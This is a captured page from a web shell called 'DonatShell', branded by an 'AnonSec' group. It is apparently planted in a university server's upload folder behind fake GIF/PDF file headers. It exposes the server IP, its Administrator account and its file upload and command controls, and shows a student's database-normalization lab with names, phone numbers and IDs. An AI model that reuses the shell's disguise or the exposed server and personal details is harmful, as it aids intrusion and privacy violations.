GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/uploads/20255/CST1600/41/16939843/Lab07/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/uploads/20255/CST1600/41/16939843/Lab07/CST1600_JesseGood_Lab07.txt
UNF:
student(Name, HomeMobilePhoneNumbers, StudentID, MajorCode1, MajorCode2, MajorCode3)

Name 		HomeMobilePhoneNumbers 		studentID 	MajorCode1 	MajorCode2 	MajorCode3
Avram Hinton 	103-391-7811;676-683-6301 	34673656 	NSA 		CSS 		CST
Hayes Gibson 	447-149-5334 			83681840 	CST 	
Kristen Acosta 	;972-658-1570 			94086534 	CP 		MAD 	

1NF: Instead of having multiple MajorCodes, I can re-add in the student's name and ID then their Major in new rows. And keeping majors in one table


2NF: Creating a student table utilizing student name and ID. Along with studentnumber with name and phone numbers.

3NF: OK

Three data rows:

StudentMajor		Student_ID		MajorCode
			34673656		NSA
			34673656		CSS
			34673656		CST
			83681840		CST
			94086534		CP
			94086534		MAD


majors		MajorCode
		NSA
		CSS
		CST
		CP		


StudentNumber		Name			HomeMobilePhoneNumbers
			Avram Hinton		103-391-7811
			Avram Hinton		676-683-6301
			Hayes Gibson		447-149-5334
			Kristen Acosta		972-658-1570


Student		Name 			Student_ID
		Avram Hinton		34673656
		Hayes Gibson		83681840
		Kristen Acosta		94086534

Anon7 - 2022
AnonSec Team